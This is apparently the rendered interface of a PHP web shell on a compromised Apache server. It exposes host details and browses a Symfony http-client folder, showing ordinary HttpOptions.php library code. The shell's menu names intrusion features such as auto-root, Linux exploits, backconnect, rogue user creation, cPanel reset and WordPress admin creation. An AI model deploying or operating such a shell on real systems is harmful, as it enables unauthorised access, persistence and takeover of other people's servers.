Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.109
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
symfony /
http-client /
[ HOME SHELL ]
Name
Size
Permission
Action
Chunk
[ DIR ]
drwxrwxr-x
DataCollector
[ DIR ]
drwxrwxr-x
DependencyInjection
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Internal
[ DIR ]
drwxrwxr-x
Response
[ DIR ]
drwxrwxr-x
AmpHttpClient.php
6.97
KB
-rw-rw-r--
CHANGELOG.md
1.12
KB
-rw-rw-r--
CachingHttpClient.php
5.24
KB
-rw-rw-r--
CurlHttpClient.php
21.62
KB
-rw-rw-r--
HttpClient.php
3.33
KB
-rw-rw-r--
HttpClientTrait.php
24.43
KB
-rw-rw-r--
HttpOptions.php
5.44
KB
-rw-rw-r--
HttplugClient.php
9.47
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
MockHttpClient.php
3.49
KB
-rw-rw-r--
NativeHttpClient.php
17.8
KB
-rw-rw-r--
NoPrivateNetworkHttpClient.php
3.68
KB
-rw-rw-r--
Psr18Client.php
8.05
KB
-rw-rw-r--
README.md
537
B
-rw-rw-r--
ScopingHttpClient.php
3.51
KB
-rw-rw-r--
TraceableHttpClient.php
2.84
KB
-rw-rw-r--
composer.json
1.52
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HttpOptions.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpClient; use Symfony\Contracts\HttpClient\HttpClientInterface; /** * A helper providing autocompletion for available options. * * @see HttpClientInterface for a description of each options. * * @author Nicolas Grekas <p@tchwork.com> */ class HttpOptions { private $options = []; public function toArray(): array { return $this->options; } /** * @return $this */ public function setAuthBasic(string $user, string $password = '') { $this->options['auth_basic'] = $user; if ('' !== $password) { $this->options['auth_basic'] .= ':'.$password; } return $this; } /** * @return $this */ public function setAuthBearer(string $token) { $this->options['auth_bearer'] = $token; return $this; } /** * @return $this */ public function setQuery(array $query) { $this->options['query'] = $query; return $this; } /** * @return $this */ public function setHeaders(iterable $headers) { $this->options['headers'] = $headers; return $this; } /** * @param array|string|resource|\Traversable|\Closure $body * * @return $this */ public function setBody($body) { $this->options['body'] = $body; return $this; } /** * @param mixed $json * * @return $this */ public function setJson($json) { $this->options['json'] = $json; return $this; } /** * @return $this */ public function setUserData($data) { $this->options['user_data'] = $data; return $this; } /** * @return $this */ public function setMaxRedirects(int $max) { $this->options['max_redirects'] = $max; return $this; } /** * @return $this */ public function setHttpVersion(string $version) { $this->options['http_version'] = $version; return $this; } /** * @return $this */ public function setBaseUri(string $uri) { $this->options['base_uri'] = $uri; return $this; } /** * @return $this */ public function buffer(bool $buffer) { $this->options['buffer'] = $buffer; return $this; } /** * @return $this */ public function setOnProgress(callable $callback) { $this->options['on_progress'] = $callback; return $this; } /** * @return $this */ public function resolve(array $hostIps) { $this->options['resolve'] = $hostIps; return $this; } /** * @return $this */ public function setProxy(string $proxy) { $this->options['proxy'] = $proxy; return $this; } /** * @return $this */ public function setNoProxy(string $noProxy) { $this->options['no_proxy'] = $noProxy; return $this; } /** * @return $this */ public function setTimeout(float $timeout) { $this->options['timeout'] = $timeout; return $this; } /** * @return $this */ public function bindTo(string $bindto) { $this->options['bindto'] = $bindto; return $this; } /** * @return $this */ public function verifyPeer(bool $verify) { $this->options['verify_peer'] = $verify; return $this; } /** * @return $this */ public function verifyHost(bool $verify) { $this->options['verify_host'] = $verify; return $this; } /** * @return $this */ public function setCaFile(string $cafile) { $this->options['cafile'] = $cafile; return $this; } /** * @return $this */ public function setCaPath(string $capath) { $this->options['capath'] = $capath; return $this; } /** * @return $this */ public function setLocalCert(string $cert) { $this->options['local_cert'] = $cert; return $this; } /** * @return $this */ public function setLocalPk(string $pk) { $this->options['local_pk'] = $pk; return $this; } /** * @return $this */ public function setPassphrase(string $passphrase) { $this->options['passphrase'] = $passphrase; return $this; } /** * @return $this */ public function setCiphers(string $ciphers) { $this->options['ciphers'] = $ciphers; return $this; } /** * @param string|array $fingerprint * * @return $this */ public function setPeerFingerprint($fingerprint) { $this->options['peer_fingerprint'] = $fingerprint; return $this; } /** * @return $this */ public function capturePeerCertChain(bool $capture) { $this->options['capture_peer_cert_chain'] = $capture; return $this; } /** * @return $this */ public function setExtra(string $name, $value) { $this->options['extra'][$name] = $value; return $this; } }
Close